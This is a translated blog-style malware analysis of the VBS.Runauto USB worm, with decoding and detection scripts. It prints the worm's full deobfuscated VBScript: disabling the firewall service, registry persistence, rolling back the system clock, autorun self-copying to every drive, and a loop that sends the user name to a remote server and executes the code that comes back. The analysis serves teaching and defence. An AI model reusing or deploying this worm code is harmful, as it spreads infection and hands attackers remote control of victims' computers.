VBS.Runauto Script Virus Analysis

Source: Internet
Author: User
Tags: prepare, ultraedit
Recently a colleague's laptop was infected with this virus. Since I happened to be teaching VBScript to computer-science students this semester, I took the opportunity to analyze it.
First I extracted the virus sample from the infected computer. Because it was found by chance and I had nothing special prepared, I saved it in a WinRAR archive.
As soon as I opened the archive on the test machine, my Symantec 11 raised an alarm and removed the virus. To analyze a virus you must either disable the antivirus software or set up an exclusion, so I created a new "EvA" folder on the desktop, set it as an antivirus exclusion folder, and let the sample lie there quietly.
A script virus is an interpreted program, so no special decompilation tool is needed to view its source code. Windows Notepad would be enough, but I prefer UltraEdit.
Open the virus file in UltraEdit as shown in Figure 1. Note that, to keep the virus from being triggered by accident, the .vbs extension was first changed to .txt.


Figure 1 Virus Script
Once the script is open you can see that the code is very hard to read: upper- and lower-case letters are mixed at random, and there are many strings of unintelligible symbols. This is the "umbrella" the virus "thought up" to protect itself.
The case problem is easy: select the text in UE (short for UltraEdit from here on) and press Ctrl+F5 to convert it to lowercase. The password-like strings such as "00c2%0033%..." are more troublesome.
Looking through the code, every "garbled" spot is accompanied by calls to StrReverse and unescape. unescape is a standard VBScript function that decodes a string encoded by the escape function. A note on the encoding: because HTML reserves certain symbols such as "<" and ">", they have to be HTML-encoded to be displayed; escape replaces all spaces, punctuation, accented characters and other non-ASCII characters with %xx, where xx is the hexadecimal value of the character. A space, for example, becomes "%20". Characters with a value above 255, such as Chinese, are stored in the %uxxxx form. Analyzing the "passwords" shows that they are escape-encoded strings stored in reverse; together with the StrReverse function name, we can conclude that the author encoded the key code with escape and stored it reversed so the virus would evade antivirus detection.
UE can encode and decode strings directly, but it has no ready-made tool for mirroring a string. Writing a page that decodes or encodes such strings is a simple exercise for a student, but for continuity of the narrative the code is as follows:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>String reverse</title>
<script type="text/javascript">
// Mirror a string character by character (the VBScript StrReverse equivalent)
function reverseStr(s) {
    return s.split("").reverse().join("");
}
function _reverse() {
    var form = document.rev;
    var input = form.instr.value;
    var revedStr, unescapedStr;
    if (form.order.checked) {
        // Reverse first, then decode: undoes unescape(StrReverse("..."))
        revedStr = reverseStr(input);
        document.write("<strong>reversed string:</strong>", revedStr, "<br/>");
        document.write("<strong>unescaped string:</strong>", unescape(revedStr), "<br/>");
        document.write("<strong>escaped string:</strong>", escape(revedStr), "<br/>");
    } else {
        // Decode first, then reverse: undoes StrReverse(unescape("..."))
        unescapedStr = unescape(input);
        revedStr = reverseStr(unescapedStr);
        document.write("<strong>unescaped string:</strong>", unescapedStr, "<br/>");
        document.write("<strong>reversed string:</strong>", revedStr);
    }
}
</script>
</head>
<body>
<form action="" method="post" name="rev">
<input name="order" type="checkbox" value="1" /> Conversion order (reverse first, then decode)?<br/>
<input name="instr" type="text" value="Please enter" onmousemove="this.select()" />
<input type="button" value="Convert" onclick="_reverse()" />
</form>
</body>
</html>
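The same two-step decoding applied to a whole script, as an added Python example that is not the author's tool above: it folds every unescape("...") and StrReverse("...") call back into the literal it evaluates to, handling both the %XX and %uXXXX forms described above, and applies the Ctrl+F5 lowercase step only outside string literals. The SAMPLE lines are constructed in the worm's style, not taken from the real sample.

```python
import re

# JScript/VBScript unescape(): %uXXXX -> code point, %XX -> Latin-1 character.
# Hex digits are accepted in either case because the worm's vs() routine
# randomises letter case (it only forces "%U" back to "%u").
_ESC = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})', re.IGNORECASE)

def js_unescape(s):
    """Decode a string produced by VBScript's escape() function."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

# A single unescape("...") or StrReverse("...") call wrapping a plain literal.
_CALL = re.compile(r'\b(unescape|strreverse)\s*\(\s*"([^"]*)"\s*\)', re.IGNORECASE)

def fold_once(script):
    """Replace every innermost call with the literal it evaluates to."""
    def repl(m):
        fn, lit = m.group(1).lower(), m.group(2)
        out = lit[::-1] if fn == "strreverse" else js_unescape(lit)
        return '"' + out.replace('"', '""') + '"'   # re-quote as a VBScript literal
    return _CALL.sub(repl, script)

def deobfuscate(script):
    """Fold nested unescape(StrReverse("...")) layers inside-out until nothing changes."""
    while True:
        folded = fold_once(script)
        if folded == script:
            return script
        script = folded

def lowercase_code(script):
    """The author's Ctrl+F5 step, applied only outside string literals so that
    case-sensitive data such as URLs survives."""
    return re.sub(r'"[^"]*"|[^"]+',
                  lambda m: m.group(0) if m.group(0).startswith('"') else m.group(0).lower(),
                  script)

# Constructed sample in the worm's style (not a line from the real sample).
SAMPLE = ('SET WSHSHELL=CreateObject(unescape(StrReverse("llehS.tpircsW")))\n'
          'wshshell.RUN unescape(StrReverse("sseccAderahS02%pots02%ten")),0\n')

if __name__ == "__main__":
    print(lowercase_code(deobfuscate(SAMPLE)))
```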

Decoding the virus with the tool above gives the following code:

On Error Resume Next
Set fso=createobject ("Scripting.FileSystemObject")
Set Wshshell=createobject (StrReverse ("Wscript.Shell"))
Dim dri_list,dri_list0
Dim Issend
Issend=0
C_time=date ()

' Stop the SharedAccess service (Internet Connection Sharing and Firewall).
Wshshell.run "net stop SharedAccess", 0

Set drvs=fso.drives
Sysdir=fso. GetSpecialFolder (1) ' Windowsfolder=0,systemfolder=1, temporaryfolder=2
Thispath=wscript. ScriptFullName
Set Fc=fso. OpenTextFile (thispath,1) ' forreading=1,forwriting=2, forappending=8
Scopy=fc.readall
Fc. Close
Set fc=nothing
' Write the registry file Sysinfo.reg, which registers the virus to run automatically at system startup
Call WriteFile (sysdir& "\sysinfo.reg", "Windows Registry Editor Version 5.00 [hkey_local_machine\software\policies \microsoft\windows\system\scripts\startup\0\0] "Script" = "%windir%\\system32\\prncfg.vbs" "Parameters" = "" " Exectime "=hex (b): 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \currentversion\group policy\state\machine\scripts\startup\0\0] "script" = "%windir%\\system32\\prncfg.vbs" Parameters "=" "Exectime" =hex (b): 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
")
' Import Registry Sysinfo.reg
Wshshell.run "regedit/s Sysinfo.reg", 0
Wscript.Sleep 200
Fso.deletefile sysdir& "\sysinfo.reg", True

' If the currently running script is in the system directory
If InStr (thispath,sysdir) >0 Then
Dri_list0=listdrv ()
O_time=left (c_time,3) &cstr (Int (Mid (c_time,4,1)-1) &right (C_time,len (C_time)-4) ' Roll the clock back one year
Wshshell.run "cmd/c Date" &o_time,0
Wscript.Sleep 10000
For Dri_i=1 to Len (DRI_LIST0)
Call Writeauto (Mid (dri_list0,dri_i,1) & ": \")
Next
Wshshell.run "cmd/c Date" &c_time,0

' Use WMI to query the computer name and user name
Computername= "": Username= ""
Set objwmiservice=getobject ("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
Set colcomputers = objWMIService.ExecQuery ("SELECT * from Win32_ComputerSystem")
For each objcomputer in Colcomputers
Computername=objcomputer.name
Username=objcomputer.username
Next
If username= "" Then username= "Evar"
If InStr (username, "\") <=0 Then
username=computername& "\" &username
End If
Todo
If issend=0 Then
' Connect to the external server and fetch code to execute
Set xml=createobject ("Msxml2.serverxmlhttp")
Xml.open "Get", "http://202.119.104.100/zzb/eva/count.asp?a=" &username,0
' http://202.119.104.100/zzb/ is a website run by the Party Organization Department of South Normal University
Xml.setrequestheader "User-agent", "Evar"
Xml.send ()
If err.number=0 Then
Issend=1
Res=xml.responsetext
If UCase (Left (res,7)) =ucase ("execute") Then Execute Res
Else
Err.Clear
End If
Set xml=nothing
End If

Dri_list=listdrv ()
For Dri_k=1 to Len (dri_list)
If InStr (Dri_list0,mid (dri_list,dri_k,1)) <=0 Then
Call Writeauto (Mid (dri_list,dri_k,1) & ": \")
End If
Next
Dri_list0=dri_list
Wscript.Sleep 1000
Loop
Else
Wshshell.run "Explorer. \", 3
Wscript.Sleep 2000
Wshshell.appactivate LCase ("My Computer")
Wshshell.sendkeys UCase ("% c") ' Simulate the keystroke Alt+Space, C, which actually closes the window
Runflag=0

' Enumerate the current system processes via WMI
For Each ps In GetObject _
("Winmgmts:\\.\root\cimv2:win32_process").Instances_
If LCase (ps.name) =lcase ("Wscript.exe") Then
Runflag=runflag+1
End If
Next
If runflag>=2 Then Wscript.Quit
Set Sf=fso. GetFolder (Sysdir)
F_time=left (Sf.datecreated,instr (sf.datecreated, "")-1)
Wshshell.run "cmd/c Date" &f_time,0
Wscript.Sleep 100
Call WriteFile (Sysdir&lcase ("\prncfg.vbs"), vs (Scopy)
Wshshell.run "cmd/c Date" &c_time,0
Wshshell.run sysdir& "\prncfg.vbs"
End If

' Obfuscate the string by randomizing its case, producing code variants!
Function vs (Str)
Execute for I=1 to Len (str) c=ucase (Mid (str,i,1)) randomize If Int (Rnd () *100) >50 Then vs=vs&lcase (c) Else vs=vs&c End If Next vs=replace (vs,ucase ("%u"), LCase ("%u")) "
End Function

' List drives
Function Listdrv ()
Execute "Dim tmp_list tmp_list=" for each DRV in DRVs if Drv.isready Then tmp_list=tmp_list&drv.driveletter End If Next Listdrv=tmp_list "
End Function

' Write Autorun.inf file
Sub Writeauto (PATH)
' Before writing the auto file: if an Autorun.inf folder exists in path, rename it; if an Autorun.inf file exists, delete it
Execute "If fso.folderexists (path&" Autorun.inf ") Then fso.movefolder path&" Autorun.inf ", Path&rnd () ElseIf fso.fileexists (path& "Autorun.inf") Then fso.deletefile "path&", True End If "
' Launch commands for the Autorun.inf
Cmdstr= "Shell\*\command=wscript.exe" &AMP;CHR & "Eva.vbs" &AMP;CHR (34)
Autostr= "[Autorun]" &vbcrlf& "open=" &vbcrlf&replace (Cmdstr, "*", "open") &vbcrlf&replace ( CMDSTR, "*", "explore") &vbcrlf&replace (Cmdstr, "*", "find")
' Write
Call WriteFile (Path&ucase ("Autorun.inf"), AUTOSTR)
Call WriteFile (path& "Eva.vbs", vs (Scopy))
End Sub
' Write content to fpath and set the file attributes to read-only, hidden and system (7)
Sub WriteFile (fpath,content)
Execute "If fso.fileexists (fpath) Then fso.deletefile fpath,true Set fc=fso. OpenTextFile (fpath,2,true) fc.write content FC. Close Set fc=nothing set Fa=fso.getfile (Fpath) fa.attributes=7 set fa=nothing "
End Sub

The code above has been annotated extensively, and anyone who has read this far probably has a good idea of what it does. The coding quality is ordinary; since the code is downloaded from a website of South Normal University, I guess the author is a student.
In this virus the author uses a custom vs function to disguise the body: it randomly switches the case of the characters in the virus body to avoid antivirus detection. In practice this has no effect on real antivirus software. :)
This virus makes use of the registry, Windows Autorun, file operations and WMI, all mainstream technologies in today's Windows environment. All of them are Microsoft scripting technologies; VBScript in particular provides a calling interface, and technically it is the automation interface of COM components that lets all kinds of scripts call them. They were meant to let Windows scripts do more, but they serve viruses just as "well". So the main purpose of analyzing this virus is not to write viruses but to learn programming techniques and use them to make our own work and study easier. Anyone who wants to learn scripting can study this vivid example carefully.
Having said all this, I still have not described the virus itself in much detail. I always think the code is the best explanation, but I should live up to the word "Analysis" in the title.
This virus relies mainly on the Windows Autorun.inf mechanism to run. Like any virus it has to be run by the user, directly or indirectly. When an "unsuspecting user" double-clicks an infected USB drive or similar, the Autorun.inf file launches Eva.vbs. The virus first stops the SharedAccess service to shut down the Windows Firewall, mainly so that it can later communicate with the external puppet website.
After shutting down the firewall, the script writes a registry file and imports it later in the code so that the virus is started at boot, a common feature of viruses. Once started, it has to determine whether the system is already infected. Scripts usually have difficulty dealing with system processes, but fortunately Windows WMI exposes a large number of interfaces to scripts, and the virus uses it to detect whether several copies of itself are running; if so, it exits. The main feature of this virus is replication, which is why it is classified as a worm, but what I find most interesting is that the program actually executes commands sent to it from a puppet server.
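Two checks a defender can run on the artifacts this worm leaves behind, as an added Python example that is not part of the original post: one parses an Autorun.inf and flags open/explore/find verbs that hand a script file to wscript, the other parses .reg-file text for Group Policy startup scripts pointing to a .vbs. SAMPLE_INF and SAMPLE_REG are constructed to mirror what the listing writes; the key path and file names are the ones shown in the listing.

```python
import re

# Script engines and extensions this worm family relies on.
SCRIPT_RE = re.compile(r'\b(wscript|cscript)(\.exe)?\b|\.(vbs|vbe|js|jse|wsf)\b', re.IGNORECASE)

def parse_autorun(text):
    """Return (key, value) pairs from the [Autorun] section, keys lowercased."""
    entries, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, val = line.split("=", 1)
            entries.append((key.strip().lower(), val.strip()))
    return entries

def flag_autorun(text):
    """Entries that hand a script engine or script file to the open/explore/find
    verbs, the pattern Writeauto() in the listing above produces."""
    return [(k, v) for k, v in parse_autorun(text)
            if (k in ("open", "shellexecute") or k.startswith("shell\\"))
            and SCRIPT_RE.search(v)]

_STARTUP_KEY = re.compile(r'^\[.*\\scripts\\startup\\', re.IGNORECASE)
_SCRIPT_VALUE = re.compile(r'^"script"="(.*)"$', re.IGNORECASE)

def flag_reg(text):
    """Script paths registered as Group Policy startup scripts in .reg text."""
    hits, in_startup = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_startup = bool(_STARTUP_KEY.match(line))
            continue
        m = _SCRIPT_VALUE.match(line) if in_startup else None
        if m and SCRIPT_RE.search(m.group(1)):
            hits.append(m.group(1).replace("\\\\", "\\"))   # .reg files double backslashes
    return hits

# Constructed samples mirroring what the listing writes (not captured files).
SAMPLE_INF = ("[Autorun]\nopen=\n"
              'shell\\open\\command=wscript.exe "Eva.vbs"\n'
              'shell\\explore\\command=wscript.exe "Eva.vbs"\n'
              'shell\\find\\command=wscript.exe "Eva.vbs"\n')
SAMPLE_REG = ("Windows Registry Editor Version 5.00\n\n"
              "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System"
              "\\Scripts\\Startup\\0\\0]\n"
              '"Script"="%windir%\\\\system32\\\\prncfg.vbs"\n"Parameters"=""\n')

if __name__ == "__main__":
    print(flag_autorun(SAMPLE_INF))
    print(flag_reg(SAMPLE_REG))
```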
The virus uses the ServerXMLHTTP component to communicate with the puppet server; this technique is actually the foundation of today's AJAX. It contacts the server and executes whatever virus code it downloads, which reflects the desire of today's virus authors to control their "broilers" (zombie machines) for a long time. What I do not understand is the piece of code that reads the user account of the current computer and sends the user information to the server. As is well known, most Chinese installations of the operating system are pirated copies, including the recently notorious "Tomato Garden" modified Windows. Such builds have one thing in common: the installed system uses its "brand" as the user name, so the default user on a "Tomato Garden" Windows is usually "Tomato Garden". Judging by the code, is the virus also taking a census of pirated Windows installations?
The last thing to mention is that the virus changes the system time, and changing the system time is often a fatal way to attack antivirus software. Ironically, just by setting the clock back a year, the license period of many antivirus products becomes invalid. Back when Windows XP was newly released, setting the wrong time could crash the system; a wrong time often breaks a seemingly solid system. In this case Kaspersky's license becomes invalid and its antivirus engine stops with it, so a student virus with no particular skill or difficulty can go a long way. Isn't that ironic for antivirus vendors? To protect their own interests (time-limited licensing) they expose users to attack by viruses. Some vendors are aware of this problem: when a license expires the scanning engine should not be shut down; at most, virus database updates should stop. The cleverest part of the time change is that the clock is set back rather than forward: the author cannot know whether a user's antivirus license runs for one year or n years, but setting the clock back a year is certain to break it. To a person the license looks as normal as ever, but the computer can no longer make sense of it.
The above is my simple analysis of the virus, covering mainly the parts that interest me. On protection: a while ago I attended a Symantec product launch in Nanjing, where a salesman presenting their products said, "Nobody lets their computer run naked any more!" Many of you will know that "running naked" means using a computer with no antivirus software installed. In fact the salesman was wrong: I ran "naked" for more than a year without any problem with the system, and that is not just my own claim; a brand of antivirus software I installed later scanned the machine and found no trace of a virus. As for why I installed it later, it was purely to test that brand of antivirus, and then I was too lazy to remove it.
Many friends will say, you are really a "superman". My answer is that there is nothing superhuman about it; you can do it too. The key is that you don't!
Looking at the whole run of this virus, we can see that basically every key operation needs administrator privileges to succeed: changing the time, enumerating system processes, reading and writing the registry. If you use an account with only normal user privileges, I don't think this virus will bother you.
Also, because I like analyzing virus behaviour, I have picked up some skills for "escaping" viruses. Many years ago I analyzed the "Happy Time" script virus, when I was not yet familiar with VBScript; that virus gave me a deeper understanding of what VBScript can do, and inspired me to use scripting flexibly to solve problems in my later work.


Appendix: Symantec's information on the virus
Discovered: March 12, 2007
Updated: March, 2007 5:17:48 PM
Type: Worm
Infection length: 1,112 bytes
Systems affected: Windows, Windows, Windows XP, Windows Me, Windows NT, Windows 2000
VBS.Runauto is a Visual Basic script worm that copies itself into the root folder of all drives (including removable devices) except floppy drives.
Protection
Initial Rapid Release version: March 13, 2007
Latest Rapid Release version: September, 2008 revision 038
Initial Daily Certified version: March 13, 2007
Latest Daily Certified version: September, 2008 revision 039
Initial Weekly Certified release date: March 14, 2007
Threat Assessment
Wild
Wild Level: Low
Number of infections: 0-49
Number of sites: 0-2
Geographical distribution: Low
Threat containment: Easy
Removal: Easy
Damage
Damage Level: Low
Payload: Copies itself to all drives on the compromised computer.
Distribution
Distribution Level: Low
Writeup by: Mircea Ciubotariu
